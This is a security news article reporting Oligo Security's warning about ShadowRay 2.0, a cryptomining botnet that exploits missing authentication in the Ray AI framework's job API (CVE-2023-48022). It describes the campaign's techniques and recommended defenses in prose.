ShadowRay 2.0 Exploits Ray AI Flaw for Crypto Botnet Attack

Oligo Security has issued a warning about an ongoing global attack campaign exploiting a two-year-old vulnerability in the Ray open-source Artificial Intelligence (AI) framework. The exploit allows threat actors to hijack clusters equipped with NVIDIA GPUs, turning them into a self-propagating cryptocurrency mining botnet dubbed ShadowRay 2.0. This campaign is a continuation of activity observed from September 2023 to March 2024 and has likely been active since September 2024.

The critical flaw, identified as CVE-2023-48022 with a CVSS score of 9.8, stems from missing authentication in the Ray Job Submission API at the endpoint “/api/jobs/”. Attackers submit malicious jobs containing Bash and Python payloads to exposed dashboards, gaining control over the clusters. The vulnerability remains unpatched due to a “long-standing design decision” by the developers to run Ray in isolated environments and trust submitted code, as detailed in an update by Anyscale.

Infected clusters become part of a worm capable of spreading the Malware autonomously by distributing payloads to other vulnerable Ray servers. The malware uses the platform’s orchestration abilities to move laterally to nodes not visible on the internet, maintain remote access through reverse shells, and persist by executing a cron job every 15 minutes that fetches updated malware versions from GitLab repositories.

The campaign employs GitHub and GitLab for Hosting malicious payloads under accounts like “ironern440-group” and “thisisforwork440-ops,” both of which have been removed following takedown requests. However, attackers quickly recreated accounts, signaling ongoing persistence. The malicious code shows signs of leveraging large language models (LLMs) to generate the payloads, based on its structure and comments.

The infection mechanism includes checks to exclude targets in China by deploying region-specific malware only outside that area. The malware also eliminates competing cryptocurrency miners on infected hosts to maximize resource use. Additionally, processes are disguised as legitimate Linux kernel workers, and CPU use is capped around 60% to avoid detection.

Despite recommendations for Ray to operate in controlled networks, over 230,500 Ray servers remain exposed online. These are detectable using tools such as the open-source vulnerability scanner interact.sh.

Anyscale has responded by releasing a “Ray Open Ports Checker” utility to verify cluster configurations and prevent accidental exposure. Recommended defenses include restricting network access via firewall rules and implementing authentication for the Ray Dashboard port (default TCP 8265), as outlined here.

In addition to cryptojacking, compromised clusters have been used in denial-of-service (DDoS) attacks using tools like sockstress. These attacks target competitor mining pools and other infrastructure by flooding port 3333, commonly associated with mining services, indicating diversified monetization strategies by threat actors.

“The attackers have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” said researchers Avi Lumelsky and Gal Elbaz, highlighting the dangerous evolution of this campaign.

✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.

Previous Articles:

• Shiba Inu Price Plunges 65.6% Since November 2024 Amid Market Crash
• Nvidia Faces Skepticism as Analysts Warn of AI, Customer Risks
• SoftBank’s PayPay Integrates Payment Rails on Binance Japan
• Indian Rupee Hits 88.76, May Fall to 90 by March 2026
• Musk Predicts AI Will Make Money Irrelevant; Wall St. Skeptical